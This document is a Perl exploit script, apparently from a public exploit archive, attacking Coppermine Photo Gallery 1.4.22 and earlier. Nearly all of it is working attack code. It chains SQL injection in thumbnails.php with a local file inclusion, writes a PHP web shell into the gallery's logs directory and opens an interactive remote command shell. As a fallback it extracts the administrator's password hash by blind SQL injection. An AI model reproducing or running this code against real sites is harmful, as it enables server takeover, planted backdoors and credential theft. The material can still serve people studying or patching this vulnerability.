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Coppermine Photo Gallery <= 1.4.22 Remote Exploit
================================================= Coppermine Photo Gallery <= 1.4.22 Remote Exploit ================================================= #!/usr/bin/perl # Coppermine Photo Gallery <= 1.4.22 Remote Exploit # Need register_globals = on and magic_quotes_gpc = off # Coded by girex use LWP::UserAgent; if(not defined $ARGV[0]) { banner(); print "[-] Usage: perl $0 [host] [path]\n"; print "[-] Example: perl $0 localhost /gallery/\n\n"; exit; } my $lwp = new LWP::UserAgent or die; my $target = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; $target .= $ARGV[1] unless not defined $ARGV[1]; $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/; my $uid = '1'; # Change if need my @chars = ('1'..'9', 'a'..'f'); my $injection = '<?php if(isset($_SERVER[HTTP_CMD])) {echo 12345; passthru(stripslashes($_SERVER[HTTP_CMD]));}?>'; banner(); $lwp->default_header('Accept-Language: en-us,en;q=0.5'); my $html = inj_request(' WHERE x'); # Wrong query to obtain an error if(not defined $html) { print "[-] Request mistake. Exploit terminated!\n"; exit (); } elsif($html =~ /There was an error while processing a database query/) { print "[+] Site vulnerable. Trying to retrieve absolute path...\n"; } else { print "[-] Site not vulnerable to SQL Injection in thumbnails.php\n"; print "[-] Maybe magic_quotes = On or register_globals = Off\n"; end_try(); } # This LFI includes README.txt that contais php code with phpinfo() function. my $res = $lwp->get("${target}index.php?GLOBALS[USER][ID]=5b83a5f92603efcdb65d47c9a2991d6b&GLOBALS[USER][lang]=../README.txt%00"); if($res->content =~ /<tr><td class=\"e\">_SERVER\[\"SCRIPT_FILENAME\"\]<\/td><td class=\"v\">(.*)index\.php<\/td><\/tr>/) { $path_to = $1; } else { print "[-] Unable to retrieve the absolute path. Problems with LFI.\n"; end_try(); } $html = inj_request("AND 1=2 UNION ALL SELECT '${injection}' INTO OUTFILE '${path_to}logs/log_db.inc.php"); my $res = $lwp->get($target.'logs/log_db.inc.php'); if($res->is_success) { print "[+] Shell injected at ${path_to}logs/log_db.inc.php\n\n"; } else { print "[-] Shell upload failed, MySQL cannot write to logs path!\n\n"; print "[+] Attempting to retrieve admin's md5..\n"; blind_sql(); if(length($hash) != 32) { print "\n\n[-] Exploit mistake: unable to retrieve admin's md5\n"; } else { print "\n"; } end_try(); } while(1) { print "[+] coppermine\@shell:~\$ "; chomp(my $cmd = <STDIN>); end_try() if $cmd eq 'exit'; $lwp->default_header( 'CMD' => $cmd ); my $res = $lwp->get($target.'logs/log_db.inc.php'); if($res->is_success and $res->content =~ /12345/) { print "\n". substr($res->content, index($res->content, '12345') + 5)."\n"; } else { print "[-] Something wrong, command execution failed!\n"; last; } } sub inj_request { my $sql = shift; my $res = $lwp->get($target. "thumbnails.php?lang=english&album=alpha&GLOBALS[cat]=999'+${sql}"); if($res->is_success) { return $res->content; } return undef; } sub blind_sql { our $hash = ''; my $prefix = get_prefix() or 'cpg14x'; my $username = get_username() or 'admin'; $| = 1; print "[+] username: ${username} - md5 hash: "; for($i = 1; $i <= 32; $i++) { foreach $char(@chars) { $html = inj_request("OR+SUBSTRING((SELECT+user_password+FROM+${prefix}_users+WHERE+user_id=${uid}),${i},1)='${char}'%23"); if($html =~ /The selected album\/file does not exist/) { $hash .= $char; syswrite(STDOUT, $char, 1); last; } } last if $i != length($hash); } } sub get_prefix # File update.php shows the query executed to update the tables, we can get table prefix from it { my $rv = undef; my $res = $lwp->get($target.'update.php'); if($res->is_success and $res->content =~ /CREATE TABLE IF NOT EXISTS (\w+)_sessions/) { $rv = $1; } return $rv; } sub get_username { my $rv = undef; my $res = $lwp->get($target."profile.php?lang=english&uid=${uid}"); if($res->content =~ /<td class="tableh1" colspan="2">(.*)'s profile<\/td>/) { $rv = $1; } return $rv; } sub end_try { my $res = $lwp->get($target.'register.php?lang=english'); if($res->is_success and $res->content !~ /You don't have permission to access this page/) { print "\n[+] Target can be vulnerable to SQL Injection for registered users\n"; print "[+] See http://www.milw0rm.org/exploits/8713 to know how to exploit it!\n\n"; } else { print "\n[-] The target is NOT vulnerable to the SQL Injection for registered users\n\n"; } exit; } sub banner { print "\n[+] Coppermine Photo Gallery <= 1.4.22 Remote Exploit\n"; print "[+] Coded by girex\n"; print "\n"; } # 0day.today [2024-12-23] #